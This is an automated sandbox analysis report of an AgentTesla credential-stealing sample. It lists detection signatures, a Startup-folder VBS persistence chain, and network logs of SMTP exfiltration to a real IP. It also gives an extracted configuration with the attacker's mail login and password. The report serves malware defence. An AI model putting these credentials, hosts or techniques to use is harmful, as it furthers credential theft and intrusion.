Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#20203216.exe

Overview

General Information

Sample name:Ref#20203216.exe
Analysis ID:1579787
MD5:9f9df5620e05da5bbf797b8531da35ab
SHA1:22be3755c61f577fb39e4d71df0f8d9bfb90aa87
SHA256:e97247599a336032a86ea5cb42b3b9c971567977e245b689d87c3f2ef3d200e4
Tags:bookingexeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#20203216.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\Ref#20203216.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
    • Ref#20203216.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\Ref#20203216.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
  • wscript.exe (PID: 6704 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • iulue.exe (PID: 3264 cmdline: "C:\Users\user\AppData\Roaming\iulue.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
      • iulue.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Roaming\iulue.exe" MD5: 9F9DF5620E05DA5BBF797B8531DA35AB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000001.00000002.2955905751.0000000002D04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 28 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Ref#20203216.exe.6da0000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Ref#20203216.exe.41014f0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Ref#20203216.exe.41014f0.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Ref#20203216.exe.41014f0.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x96b63:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x96bd5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x96c5f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x96cf1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x96d5b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x96dcd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x96e63:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x96ef3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.iulue.exe.3a2fd10.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 14 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , ProcessId: 6704, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#20203216.exe, Initiated: true, ProcessId: 2120, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs" , ProcessId: 6704, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#20203216.exe, ProcessId: 6776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-23T09:08:46.577495+010020301711A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      2024-12-23T09:08:46.577495+010020301711A Network Trojan was detected192.168.2.449744162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-23T09:08:59.228245+010028555421A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      2024-12-23T09:09:15.923427+010028555421A Network Trojan was detected192.168.2.449744162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-23T09:08:59.228245+010028552451A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      2024-12-23T09:09:15.923427+010028552451A Network Trojan was detected192.168.2.449744162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-23T09:08:46.577495+010028400321A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      2024-12-23T09:08:46.577495+010028400321A Network Trojan was detected192.168.2.449744162.254.34.31587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\iulue.exeReversingLabs: Detection: 36%
                      Source: Ref#20203216.exeVirustotal: Detection: 47%Perma Link
                      Source: Ref#20203216.exeReversingLabs: Detection: 36%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\iulue.exeJoe Sandbox ML: detected
                      Source: Ref#20203216.exeJoe Sandbox ML: detected
                      Source: Ref#20203216.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: Ref#20203216.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49744 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /nvgU HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nvgU HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /nvgU HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nvgU HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Ref#20203216.exe, 00000001.00000002.2955905751.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000007.00000002.2956983411.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/nvgU
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.0000000002AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#20203216.exe, iulue.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab

                      System Summary

                      barindex
                      Source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 0_2_0178E0A80_2_0178E0A8
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 0_2_0772EDA80_2_0772EDA8
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 0_2_0772E2600_2_0772E260
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 0_2_077100400_2_07710040
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 0_2_0771003D0_2_0771003D
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012AE5081_2_012AE508
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012AAA121_2_012AAA12
